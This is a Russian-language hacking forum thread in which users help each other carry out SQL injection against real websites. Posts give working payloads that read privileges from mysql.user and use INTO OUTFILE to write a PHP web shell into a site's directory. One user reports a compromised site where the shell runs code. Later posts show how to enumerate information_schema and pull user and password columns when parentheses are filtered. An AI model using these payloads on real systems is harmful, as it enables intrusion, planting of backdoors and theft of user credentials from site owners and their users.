24.06.2013, 16:14
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами:
7278806
Репутация:
26
|
|
Сообщение от Evil_Genius
Ну вот я делаю по такому плану чтобы узнать file_priv:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,grant_priv,0x27,0x7e))+fr om+mysql.user+where+user='root'+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Мне выдает:
Ошибка SQL запроса Duplicate entry '~'
Y
'~1' for key 'group_key'
Далее делаю заливку файла:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,'123456',0x27,0x7e))+from+mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`information_s chema`.tables+group+by+x)a)+and+1=1
На что мне выдает:
Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and'
at line 1
Где ошибка?
в blind sql-inj, это делается, как правило таким образом
Код:
?var=data' LIMIT 1 INTO OUTFILE '/home/path/site/shell.php' LINES TERMINATED BY ''-- 1
|
|
|
24.06.2013, 16:18
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Evil_Genius
Где ошибка?
Ты узнаешь grant_priv, а не file_priv. И зачем писать запрос для вывода ошибки, если можно выполнить простой подзапрос?
Код:
+and(select'123'into+outfile+'/tmp/gg.txt')+and+1=1
Havij+Sniffer = Bad.
P.S. Нашел сайт, льется нормально:
news/images/aa.php?a=phpinfo();
|
|
|
|
24.06.2013, 23:12
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами:
8255126
Репутация:
0
|
|
Есть проблема:
SQL фильтрует скобки () то есть запрос просто останавливается… впринципе возможно раскрутить и без скобок в особом случае, но и тут облом - при выводе из базы она ругается на несоответствующий тип данных, то есть информацию из базы надо конвертировать во что то, а конверт функции разумеется юзают (), поэтому как быть, я затрудняюсь.
Как быть?
|
|
|
|
25.06.2013, 00:52
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...
|
|
|
|
25.06.2013, 01:03
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами:
8255126
Репутация:
0
|
|
Сообщение от winstrool
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.
|
|
|
|
25.06.2013, 01:20
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от preno
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
|
|
|
|
25.06.2013, 01:42
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 245
С нами:
8255126
Репутация:
0
|
|
Сообщение от winstrool
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user
|
|
|
|
25.06.2013, 01:45
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от preno
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user
|
|
|
|
25.06.2013, 01:49
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Сообщение от winstrool
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
Жестко.
|
|
|
|
25.06.2013, 09:30
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от preno
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user
вместо 0x75736572 попробуй unhex(hex(user))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
